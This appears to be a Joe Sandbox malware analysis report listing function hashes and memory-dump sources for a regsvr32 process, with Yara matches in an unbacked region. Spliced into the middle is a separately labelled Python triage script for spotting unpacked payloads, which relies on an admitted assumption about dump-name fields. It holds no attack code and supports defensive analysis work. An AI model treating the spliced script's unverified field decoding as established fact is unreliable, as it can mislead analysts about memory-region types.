                                                                                                                                • Instruction ID: bbb3bee9fa9cdc8f6282772afd18f295cdd348f2c7f059baa6db29b6d6e0bb5b
                                                                                                                                • Opcode Fuzzy Hash: e694fe3bb7f23863c566d88b3f3e9b79af36947dfdaac95326105a138b36f14b
                                                                                                                                • Instruction Fuzzy Hash: A9215DB550C3848BC788DF28C49651BBBE1BB8C318F444B2DF4CAAA365D7789654CF4A
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate_errno_getptd
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1583075380-0
                                                                                                                                • Opcode ID: b49a52df605eb860e81aecf945551c905b422740176ff48a34f4eb53aef691de
                                                                                                                                • Instruction ID: 92953a5af30ae2a77564380b2c39725e4362f7166b853fc33fdaac9354d1789b
                                                                                                                                • Opcode Fuzzy Hash: b49a52df605eb860e81aecf945551c905b422740176ff48a34f4eb53aef691de
                                                                                                                                • Instruction Fuzzy Hash: B0A1B132B1868342EB649F3696157BEB3A6EB85BD0F448135DE4D5BAE9CF3CE0118301
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d9410001777fc81e6582bcbf2c9e1b051a8f1f2b874c05684980e9ac5d71aab9
                                                                                                                                • Instruction ID: 70989dc1c7b0955b44ba62b06870f64af454fefcadc428673f0cc11b0aa956f2
                                                                                                                                • Opcode Fuzzy Hash: d9410001777fc81e6582bcbf2c9e1b051a8f1f2b874c05684980e9ac5d71aab9
                                                                                                                                • Instruction Fuzzy Hash: 4371AEB2F185474BD35C8B28E95177876E6EBE4314F589035D90ACAAF9EE39F9008701
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5d0a71211182b7f87b6da8fb5c4bb16c050ce1c1bc57c3eb72ccfc764dcd8f25
                                                                                                                                • Instruction ID: 8540b9e78b3a5a21de6b0995fa07f246b5a6616f24314d9c292e70c997d69f1a
                                                                                                                                • Opcode Fuzzy Hash: 5d0a71211182b7f87b6da8fb5c4bb16c050ce1c1bc57c3eb72ccfc764dcd8f25
                                                                                                                                • Instruction Fuzzy Hash: 03916670904B0D8BDF48DF94C48A1EEBBF1FB48358F15821DE84AA7250DB749A89CF85
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: efccbdecd07d61b7fd9807909e593046fc70b22fd17ef27bebbdee29ceef9f7a
                                                                                                                                • Instruction ID: b4cc55b2ba55f7836136ac8b5ed3643aad821ec95d31101853fef74eb9d9cec8
                                                                                                                                • Opcode Fuzzy Hash: efccbdecd07d61b7fd9807909e593046fc70b22fd17ef27bebbdee29ceef9f7a
                                                                                                                                • Instruction Fuzzy Hash: FF51787090470DABDBA9CF64C4893EEBBF0FB48354F60806DE85697390DB749A85CB81
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1505da822373411ddcecd725c63ebafe53e843356a51ddc09aa4b8a95d314011
                                                                                                                                • Instruction ID: 8a210f576f06192acb1348665dce29b8299704b90f8c36c4c02948eefca36544
                                                                                                                                • Opcode Fuzzy Hash: 1505da822373411ddcecd725c63ebafe53e843356a51ddc09aa4b8a95d314011
                                                                                                                                • Instruction Fuzzy Hash: 98819EB590034E8FCB48CF68C48A5DE7FB0BB68394F614219F8569A260D774DAA5CFC4
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 197fc001b9ca96d8c078894440fafc4def679aa452f545048d4dbe605d0ae04d
                                                                                                                                • Instruction ID: a715a821166c3325a5f96f2d5301173626eb48cd37bd72c2dcb4fea3562e42b3
                                                                                                                                • Opcode Fuzzy Hash: 197fc001b9ca96d8c078894440fafc4def679aa452f545048d4dbe605d0ae04d
                                                                                                                                • Instruction Fuzzy Hash: 79512EB150074A8BDB49DF28C0D76AE3FE1EB64388F20411DFD468A295D774DAA9CBC1
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f7aced778150c02bbca5db0e3f41738242a846810a111e238ccae7171f94d46c
                                                                                                                                • Instruction ID: fc479b7e82b21315ffd406d8fba444b33d09de74539f70da2a8813263b1569c5
                                                                                                                                • Opcode Fuzzy Hash: f7aced778150c02bbca5db0e3f41738242a846810a111e238ccae7171f94d46c
                                                                                                                                • Instruction Fuzzy Hash: 65416D7020DB488FD768DF18948975ABBF0FB9A740F404A9DE5CAC7256D771D844CB82
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 97ae2c8ea2cdf4840b91f894fd37a694475120081486fc145809f74360d0bada
                                                                                                                                • Instruction ID: dbb4fad0742d9b29c59b9a64f17438fc1cba9462e735a4e3b2d00d7b8da19945
                                                                                                                                • Opcode Fuzzy Hash: 97ae2c8ea2cdf4840b91f894fd37a694475120081486fc145809f74360d0bada
                                                                                                                                • Instruction Fuzzy Hash: 4C5192B490038E8FCB48CF69C84A5DE7BB1FB48358F104A19FC26A6250D7B4D665CF94
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f1b44f26b2e4c7e97ddfb81a3adbda3d77288edc4ecbe0bae8cc8933f1c33e44
                                                                                                                                • Instruction ID: 08efbb833ea687ad733901112953304226336fcfa3581264405f9509991f6ff4
                                                                                                                                • Opcode Fuzzy Hash: f1b44f26b2e4c7e97ddfb81a3adbda3d77288edc4ecbe0bae8cc8933f1c33e44
                                                                                                                                • Instruction Fuzzy Hash: 6551BEB490074A8BCB48CF68D4875DE7FB0FB68398F20421DEC56AA250D3B496A5CFD4
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 16eb5be53274359ca32061ddf2fd9752b6767c1a5dd3248deb14ec1aa5e29bf1
                                                                                                                                • Instruction ID: 52c1f8436ada09c5d91cc0f6a0e49c089501cc81ef075f7e28a52ff611ebfcf9
                                                                                                                                • Opcode Fuzzy Hash: 16eb5be53274359ca32061ddf2fd9752b6767c1a5dd3248deb14ec1aa5e29bf1
                                                                                                                                • Instruction Fuzzy Hash: D351B3B190438E8FCB48DF68D98A5DE7BB0FB48348F104A19FC26A6250D3B4D664CF85
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: bcde6b28aa1f9cc532f581acc23668cd4c3c6920105dcd3780d199daaa58310a
                                                                                                                                • Instruction ID: 871f118089c9e262c63038bd4f0fd9666d89e9c6fa6f13266ea976bdce614408
                                                                                                                                • Opcode Fuzzy Hash: bcde6b28aa1f9cc532f581acc23668cd4c3c6920105dcd3780d199daaa58310a
                                                                                                                                • Instruction Fuzzy Hash: CB41393190071DABDB95CFA4C8892EEBBF1FF44358F608159E852A7384DBB49685CF81
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: be6c09d37bb88d9ef1cd1e4f7c6fe28a3503fab801bd979a9297db1a45dede51
                                                                                                                                • Instruction ID: 72cb41ac5f9990f9c197b8bd4b5430fc958a2c545255f7632808fe9bc15cd904
                                                                                                                                • Opcode Fuzzy Hash: be6c09d37bb88d9ef1cd1e4f7c6fe28a3503fab801bd979a9297db1a45dede51
                                                                                                                                • Instruction Fuzzy Hash: A141D27090034A8BCB48DF68D8865DE7FB0FB58388F20461DE81AA6350D3B896A5CBD5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

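Reading hundreds of these function records by hand is impractical. As an added example (it is not part of the Joe Sandbox report and not Joe Security's code), the following Python script parses the flattened record format used above, groups the functions by memory dump, and flags dumps whose functions carry Yara matches, sit in executable private memory and are not backed by a PE header at the dump base. That combination is what points at an unpacked payload worth carving; on this page it is the region at 0x180001000 inside regsvr32. The sample input is copied from records on this page with the layout whitespace trimmed. The interpretation of the dump file name fields (base address in the fourth field, page protection in the fifth, region type in the seventh, in VirtualQuery terms) is an assumption inferred from these records rather than documented behaviour; every other value is read from the labelled fields.

```python
"""Triage helper for Joe Sandbox function-level records (added example, not report code)."""
import re
from collections import defaultdict

# Win32 memory constants used to interpret the .sdmp file name (field layout is an assumption).
MEM_PRIVATE, MEM_MAPPED, MEM_IMAGE = 0x20000, 0x40000, 0x1000000
PAGE_EXECUTE_MASK = 0x10 | 0x20 | 0x40 | 0x80  # PAGE_EXECUTE, _READ, _READWRITE, _WRITECOPY

RECORD_START = "Memory Dump Source"

# Three records copied from this page (one from the regsvr32 image, two from the
# Yara-matched region at 0x180001000); "Download File" is extraction residue kept on purpose.
SAMPLE_REPORT = """
Memory Dump Source
• Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
• Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
Similarity
• API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate_errno_getptd
• String ID:
• API String ID: 1583075380-0
• Opcode ID: b49a52df605eb860e81aecf945551c905b422740176ff48a34f4eb53aef691de
• Instruction ID: 92953a5af30ae2a77564380b2c39725e4362f7166b853fc33fdaac9354d1789b
Uniqueness
Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• Opcode ID: 5d0a71211182b7f87b6da8fb5c4bb16c050ce1c1bc57c3eb72ccfc764dcd8f25
Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• Opcode ID: efccbdecd07d61b7fd9807909e593046fc70b22fd17ef27bebbdee29ceef9f7a
Uniqueness Score: -1.00%
"""


def parse_records(text):
    """Split the flattened report text into one dict per function record."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        if line == RECORD_START:
            cur = {"yara": False, "associated": []}
            records.append(cur)
            continue
        if cur is None:
            continue  # text before the first record
        if line == "Yara matches":
            cur["yara"] = True
            continue
        key, sep, value = line.partition(":")
        if not sep:
            continue  # bare section labels: "Similarity", "Uniqueness", "Joe Sandbox IDA Plugin"
        key, value = key.strip(), value.strip()
        if key == "Source File":
            m = re.match(r"(\S+),\s*Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(true|false)", value)
            if not m:
                raise ValueError(f"unexpected Source File line: {value}")
            cur["source_file"] = m.group(1)
            cur["offset"] = int(m.group(2), 16)
            cur["based_on_pe"] = m.group(3) == "true"
        elif key == "Associated":
            # page extraction glues the "Download File" link text onto these names
            cur["associated"].append(value.replace("Download File", "").strip())
        elif key == "Uniqueness Score":
            cur["uniqueness"] = float(value.rstrip("%"))
        else:
            cur[key] = value  # API ID, String ID, Opcode ID, Instruction ID, fuzzy hashes, ...
    return records


def describe_dump(name):
    """Decode base address, executability and region type from the .sdmp name (assumed layout)."""
    stem = name[: -len(".sdmp")] if name.endswith(".sdmp") else name
    fields = stem.split(".")
    if len(fields) < 8:
        return None
    protect, region_type = int(fields[4], 16), int(fields[6], 16)
    type_name = {MEM_PRIVATE: "MEM_PRIVATE", MEM_MAPPED: "MEM_MAPPED", MEM_IMAGE: "MEM_IMAGE"}
    return {
        "base": int(fields[3], 16),
        "executable": bool(protect & PAGE_EXECUTE_MASK),
        "type": type_name.get(region_type, hex(region_type)),
    }


def triage(records):
    """Group records per dump and flag dumps that look like an unpacked, headerless payload."""
    by_dump = defaultdict(list)
    for r in records:
        by_dump[r["source_file"]].append(r)
    summary = {}
    for name, recs in by_dump.items():
        info = describe_dump(name) or {}
        row = {
            "functions": len(recs),
            "yara": any(r["yara"] for r in recs),
            "based_on_pe": all(r["based_on_pe"] for r in recs),
            "with_api_ids": sum(1 for r in recs if r.get("API ID")),
            "region_type": info.get("type"),
            "executable": info.get("executable"),
        }
        row["carve_candidate"] = (
            row["yara"] and row["executable"] is True
            and row["region_type"] == "MEM_PRIVATE" and not row["based_on_pe"]
        )
        summary[name] = row
    return summary


if __name__ == "__main__":
    for dump, row in triage(parse_records(SAMPLE_REPORT)).items():
        print(dump, row)
```

Run it against the full report text instead of the embedded sample to get one line per dump; the `carve_candidate` flag then names the regions to extract with the sandbox's "Download File" link and load into a disassembler at the recorded `Offset`, since a dump flagged `based on PE: false` has no header to derive the image base from.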
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 937cbbccdfb62f32f5a53fbe7826fb6fdb7ed657b014fade726fdd4e8827f138
                                                                                                                                • Instruction ID: 5a85513126e01a98bb902dccfe4af02f6196fd3989a765a33a65cbdcda0cb452
                                                                                                                                • Opcode Fuzzy Hash: 937cbbccdfb62f32f5a53fbe7826fb6fdb7ed657b014fade726fdd4e8827f138
                                                                                                                                • Instruction Fuzzy Hash: 0641E5B091038A8FCF88DF64D84A5DE7BB0FB58358F104A1DFC65A6250E3B49664CF85
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 17a73d98c2b5216e6ebfe3da59b71ff0bc58f6e68d4a2580613c8fab7b77e503
                                                                                                                                • Instruction ID: 77361ced58272e7b73a95c704b243c92926a81ca7bf4620d616fd1e275fcbc28
                                                                                                                                • Opcode Fuzzy Hash: 17a73d98c2b5216e6ebfe3da59b71ff0bc58f6e68d4a2580613c8fab7b77e503
                                                                                                                                • Instruction Fuzzy Hash: A841D2B190434E8FCB48DF68C4865DE7FF0FB58388F204219E859A6250D3B896A5CFC5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _getptd
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3186804695-0
                                                                                                                                • Opcode ID: 07c06ba19e2310f742034fc51624b2b683580184b74621a532736302abba6d70
                                                                                                                                • Instruction ID: 6f50323f4729ea5ba3736779dd0e048ec9f03dd86f551d69ad493ef00039cb1b
                                                                                                                                • Opcode Fuzzy Hash: 07c06ba19e2310f742034fc51624b2b683580184b74621a532736302abba6d70
                                                                                                                                • Instruction Fuzzy Hash: 7231AF22A1868281EB54DB3AD4593AA77E5EB85BD0F584136EA4D4B7F6DF3CD001C701
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d3646060d8cb761d7de136982460322f3472e8f5a21e87ad1ead63779f29ae52
                                                                                                                                • Instruction ID: 4f2f4704f2b9e1c234c275d0f4f9a14eb4d491f2b4b6dbd4d57755e8fe2c6edd
                                                                                                                                • Opcode Fuzzy Hash: d3646060d8cb761d7de136982460322f3472e8f5a21e87ad1ead63779f29ae52
                                                                                                                                • Instruction Fuzzy Hash: 6341C4B090438ECFCF48CF68C8895CE7BB0FF58358F114A19E825A6250D3B49665CF95
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1d53fd4730f7ea41163b882b7fe0da69ca66e61df5fc81e281dc4420083e2c61
                                                                                                                                • Instruction ID: 4854a602bbf38c78d9fab67e5db6ce586c5dff59e36b89151347ba9907d49bba
                                                                                                                                • Opcode Fuzzy Hash: 1d53fd4730f7ea41163b882b7fe0da69ca66e61df5fc81e281dc4420083e2c61
                                                                                                                                • Instruction Fuzzy Hash: D13189B0529781ABD78CDF28C49981EBBE1FBC8344FC46A2DF9868B350D7749405CB46
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c1ebaef5654986e3774d51b7b5ee7bc532e1d9e9fdd7c85144d94fdf612fce43
                                                                                                                                • Instruction ID: b456e1b49498020112758906e0882963a909b4f1eceaef019be325c5d28b8920
                                                                                                                                • Opcode Fuzzy Hash: c1ebaef5654986e3774d51b7b5ee7bc532e1d9e9fdd7c85144d94fdf612fce43
                                                                                                                                • Instruction Fuzzy Hash: E0317570629781ABC78CDF28C59591ABBE1FBD9344F806A2DF8868B350D774D445CB42
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 465da7405903931a99b4b25fdb97e1be200aa994c495fca1ee02f708772e1815
                                                                                                                                • Instruction ID: e1cdac85440212a901397aaa30fe146fec046d1320b50ea199ee65054a90651b
                                                                                                                                • Opcode Fuzzy Hash: 465da7405903931a99b4b25fdb97e1be200aa994c495fca1ee02f708772e1815
                                                                                                                                • Instruction Fuzzy Hash: 0F317FB56187848B9388DF28C48641ABBE1FBDD30CF504B2DF8CAA6254D778D645CB4B
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 213fcaffb4d8b257d73b1e87ee3d57575e303918952cee2d1b890f97e83a5388
                                                                                                                                • Instruction ID: a8885bbbd8deb659e28c33910928e4ea9ad8e802d57f0785ac04cb05f9903a21
                                                                                                                                • Opcode Fuzzy Hash: 213fcaffb4d8b257d73b1e87ee3d57575e303918952cee2d1b890f97e83a5388
                                                                                                                                • Instruction Fuzzy Hash: 802160B0528784AFC398DF28D49981ABBF1FB89344F806A1DF98687350E374D459CB43
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 789a1fcad167e99ddc40482d8caf18e48711ae2075d057cfa5242344ff1b2506
                                                                                                                                • Instruction ID: 3e7ffcddda8d873ed620f17f9684606eb13d1dd5f0b21141b7977a2e64531d07
                                                                                                                                • Opcode Fuzzy Hash: 789a1fcad167e99ddc40482d8caf18e48711ae2075d057cfa5242344ff1b2506
                                                                                                                                • Instruction Fuzzy Hash: AF217F74529780AFC788DF29C08981EBBE1FB99748F806A1DF88697354D375D445CF42
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 825ba780bde58c245e7a1d3728ec0527652b1ee71a04877d42e2af350f08e315
                                                                                                                                • Instruction ID: 85e8bde3e512593198615bb83ad7c533a741442781c438c8658c5734f088230b
                                                                                                                                • Opcode Fuzzy Hash: 825ba780bde58c245e7a1d3728ec0527652b1ee71a04877d42e2af350f08e315
